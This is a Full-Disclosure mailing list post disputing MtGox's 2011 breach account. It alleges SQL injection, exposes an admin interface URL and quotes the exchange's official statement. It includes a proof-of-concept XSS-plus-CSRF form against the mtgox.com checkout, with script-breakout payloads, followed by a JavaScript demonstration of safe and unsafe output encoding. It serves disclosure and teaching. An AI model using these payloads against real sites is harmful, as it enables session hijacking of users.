
[Full-disclosure] More plausible mtgox.com post-mortem (Bitcoin fun week!)



I have two independent sources claiming known SQLi vulnerabilities in MtGox.

One of said SQLi vulnerabilities was confirmed to be patched on the 16th.
The other was not patched, to anyone's knowledge, at the time of the market 
crash and database leak. The one that was not patched could have plausibly been 
used to dump the user table.

The details follow in these chat logs. POC for the referenced XSS+CSRF is also 
provided. Whether or not it is still an issue is not known for sure at this 
time, as the site cannot be accessed.

It has also been found that MtGox exposes its admin user interface even if a 
user does not have the admin flag set on their account. As of now it is thought 
that most actions attempted will throw permission errors. Once 
again, this cannot be confirmed at this time. 
https://mtgox.com/app/webroot/code/admin

MagicalTux, now that you have claimed "The site was not compromised with a SQL 
injection as many are reporting, so in effect the site was not hacked.", please 
respond. The truth this time.

MagicalTux's official response at the time of this writing is also attached. It 
is available at:
https://support.mtgox.com/entries/20208066-huge-bitcoin-sell-off-due-to-a-compromised-account-rollback

These logs are not modified except for users' hostmasks at their request due to 
MagicalTux's newfound policy of committing libel against his users based on 
login logs, since he apparently doesn't keep order book logs for orders that go 
through immediately, by his own admission. Classy.

Mirrors:
http://privatepaste.com/93e8a9cd64 (#bitcoin-hax log)
http://privatepaste.com/47a50cab5b (sig)
http://www.mediafire.com/?m7o4z3oz9nyd3v3 (#bitcoin-hax log)
http://www.mediafire.com/?nzcpa5mwpw9ccbb (sig)
http://privatepaste.com/e4bacfae37 (PovAddict log)
http://privatepaste.com/9dc5daf8a0 (sig)
http://www.mediafire.com/?bflr76anvv835ib (PovAddict log)
http://www.mediafire.com/?rl250c2dahw7dx9 (sig)
http://privatepaste.com/6dad3927d6 (XSS + CSRF)
http://privatepaste.com/45e5aa0d30 (sig)
http://www.mediafire.com/?synt5sjcbkl9zvq (XSS + CSRF)
http://www.mediafire.com/?uv7be34198pseoo (sig)

Attachment: #bitcoin-hax_20110620.log
Description: Binary data

Attachment: #bitcoin-hax_20110620.log.asc
Description: Binary data

The official response from MagicalTux at time of this writing:

https://support.mtgox.com/entries/20208066-huge-bitcoin-sell-off-due-to-a-compromised-account-rollback

Huge Bitcoin sell off due to a compromised account - rollback

[Update - 12:52 GMT] Account recovery page will be up tomorrow morning (Japan 
time)
We have almost completed the account recovery page and are waiting for the 
results of unit tests and intrusion tests (and more than anything, we don't want 
to put something online and go to sleep just after, best way to get screwed), so 
the page will be put online tomorrow morning.
It will allow every user to claim ownership of their account based on proof 
such as deposits, withdrawals, password (if complex enough), email or notarized 
documentation.
Once it is deemed enough users had the chance to get their account back, the 
exchange will be open again (opening time will be announced at least 24 hours 
in advance). It will still be possible to file claims for user accounts after 
this.
[Update - 6:30 GMT] Still here. Still working hard to get things online.
        • SHA-512 multi-iteration salted hashing is enabled and ready 
for when we get users reactivating their accounts
        • We are going to push our relaunch time to 2:00am GMT tomorrow 
so we have time to launch our new backend and withdraw passwords.
Thanks to everyone sending the supportive emails and our extremely patient 
users.

[Update - 3:45 GMT] DO NOT DOWNLOAD ANYTHING
If you receive ANY email which seems to come from Mt.Gox asking you to download 
something (certificate, generating program, etc), DO NOT DOWNLOAD. Do not 
input your password on any site which is not MTGOX.COM either.

[Update - 2:06 GMT] What we know and what is being done.
        • It appears that someone who performs audits on our system and 
had read-only access to our database had their computer compromised. This 
allowed someone to pull our database. The site was not compromised with a 
SQL injection as many are reporting, so in effect the site was not hacked.
        • Two months ago we migrated from MD5 hashing to FreeBSD MD5 
salted hashing. The unsalted user accounts in the wild are ones that haven't 
been accessed in over 2 months and are considered idle. Once we are back up we 
will have implemented SHA-512 multi-iteration salted hashing and all users will 
be required to update to a new strong password.
        • We have been working with Google to ensure any Gmail accounts 
associated with Mt.Gox user accounts have been locked and need to be 
reverified.
        • Mt.Gox will continue to be offline as we continue our 
investigation; at this time we are pushing it to 8:00am GMT.
        • When Mt.Gox comes back online, we will be putting all users 
through a new security measure to authenticate the users. This will be a mix of 
matching the last IP address that accessed the account, verifying their email 
address, account name and old password. Users will then be prompted to enter 
a new strong password.
        • Once Mt.Gox is back online, trades 218869~222470 will be 
reverted.

We will continue to update as we find new information.

Huge Bitcoin sell off due to a compromised account - rollback
The bitcoin will be back to around $17.5/BTC after we roll back all trades that 
have happened after the huge Bitcoin sale that happened on June 20th near 
3:00am (JST).
One account with a lot of coins was compromised and whoever stole it (using a 
HK-based IP to log in) first sold all the coins in there, to buy those again 
just after, and then tried to withdraw the coins. The $1000/day withdrawal limit 
was active for this account and the hacker could only get out with $1000 worth 
of coins.
Apart from this no account was compromised, and nothing was lost. Due to the 
large impact this had on the Bitcoin market, we will roll back every trade which 
happened since the big sale, and ensure this account is secure before opening 
access again.
UPDATE REGARDING LEAKED ACCOUNT INFORMATION
We will address this issue too and prevent logins from each user. Leaked 
information includes username, email and hashed password, which does not allow 
anyone to get to the actual password, should it be complex enough. If you used 
a simple password you will not be able to log in on Mt.Gox until you change your 
password to something more secure. If you used the same password on different 
places, it is recommended to change it as soon as possible.
SERVICE RETURN
Service will not be back before June 20th 11:00am (JST, 02:00am GMT). This may 
be delayed depending on what is found during the investigation.

<!-- the onload auto-submit is commented out; click the button to send the POST -->
<body onload="/*document.forms['foo'].submit()*/">

<form id="foo" action="https://mtgox.com/merch/checkout" method="post">
  <input type="hidden" name="notify_url"
         value="http://yourdomain.com/ipn.php&quot;})}alert(1);function blah(){test({5:&quot;">
  <input type="hidden" name="business"      value="foobar">
  <input type="hidden" name="currency_code" value="USD">
  <input type="hidden" name="item_name"     value="Your Item Name<script>alert(1);</script>">
  <input type="hidden" name="custom"
         value="your custom msg to yourself&quot;})}alert(1);function blah(){test({5:&quot;">
  <input type="hidden" name="amount"        value="10.30">
  <input type="hidden" name="return"        value="http://yourdomain.com/thanks">
  <!--<input type="hidden" name="return"
         value="http://yourdomain.com/thanks&quot;;}alert(1);</script><script>">-->

  <input type="submit" value="Pay with Mt Gox" />
</form>
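
The POC above puts payloads into two different output contexts: item_name ends 
a plain HTML fragment with a <script> tag, while custom and notify_url close a 
JavaScript string, object literal and function ("})}alert(1);function 
blah(){test({5:") so that the injected code lands at top level of an inline 
script. The following is an added example, not MtGox's checkout code: the 
inline-script template function blah(){test({5:"..."})} is an assumption 
reconstructed from the shape of that payload, and the sandbox that records 
alert() calls exists only so the break-out can be checked offline. It shows the 
vulnerable interpolation for each context next to the context-specific encoding 
that fixes it.

```javascript
'use strict';
// Added example, not MtGox code. The inline-script template below is an
// ASSUMPTION reconstructed from the POC payload shape; the real checkout page
// was not available when this was written.

// Values taken from the POC form above (custom / item_name fields).
const POC_CUSTOM = 'your custom msg to yourself"})}alert(1);function blah(){test({5:"';
const POC_ITEM_NAME = 'Your Item Name<script>alert(1);</script>';

// ---- JavaScript-string context ------------------------------------------

// Vulnerable: merchant-supplied text is pasted straight into an inline script.
function renderInlineScriptUnsafe(custom) {
  return `function blah(){test({5:"${custom}"})}`;
}

// Hardened: JSON-encode the value so quotes and backslashes cannot end the
// literal, then neutralise what JSON leaves alone: "</script>" would still end
// the <script> element in HTML, and U+2028/U+2029 are line terminators in JS.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderInlineScriptSafe(custom) {
  return `function blah(){test({5:${jsStringLiteral(custom)}})}`;
}

// Offline check: run a generated script body with stub alert()/test() and
// record what got called. Code that escaped the string literal shows up as a
// top-level alert(); a correctly encoded value only ever reaches test().
function runInlineScript(body) {
  const calls = { alert: [], test: [] };
  const script = new Function('alert', 'test',
    `${body}\n;return typeof blah === 'function' ? blah : null;`);
  const blah = script(v => calls.alert.push(v), v => calls.test.push(v));
  if (blah) blah(); // the page invoking its own handler afterwards
  return calls;
}

// ---- HTML-body context needs a different encoder --------------------------

function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

function renderItemNameUnsafe(name) { return `<h1>${name}</h1>`; }
function renderItemNameSafe(name)   { return `<h1>${escapeHtml(name)}</h1>`; }

// Stand-alone run: both POC payloads through the unsafe and the safe renderers.
function demo() {
  return {
    unsafeScript: runInlineScript(renderInlineScriptUnsafe(POC_CUSTOM)),
    safeScript:   runInlineScript(renderInlineScriptSafe(POC_CUSTOM)),
    unsafeHtml:   renderItemNameUnsafe(POC_ITEM_NAME),
    safeHtml:     renderItemNameSafe(POC_ITEM_NAME),
  };
}
console.log(JSON.stringify(demo(), null, 2));
```

In the unsafe case the payload re-closes the function it broke out of, so the 
generated script is still syntactically valid and alert(1) runs at top level; 
with the JSON-encoded literal the same bytes arrive intact as the argument to 
test(). HTML-escaping alone would not fix the JavaScript-string case and 
JSON-encoding alone does not fix the HTML case; each output context needs its 
own encoder. A victim who submits the attacker's form (the POC's onload 
auto-submit is commented out) would have the script run in the mtgox.com origin, 
which is the CSRF half of the POC: as the form implies, the checkout endpoint 
accepts a cross-site POST without a request-specific token.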

Attachment: mtgox-ss.txt.asc
Description: Binary data

Attachment: PovAddict_20110620.log
Description: Binary data

Attachment: PovAddict_20110620.log.asc
Description: Binary data


-- 
Douglas Huff


Attachment: smime.p7s
Description: S/MIME cryptographic signature

Attachment: PGP.sig
Description: This is a digitally signed message part

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/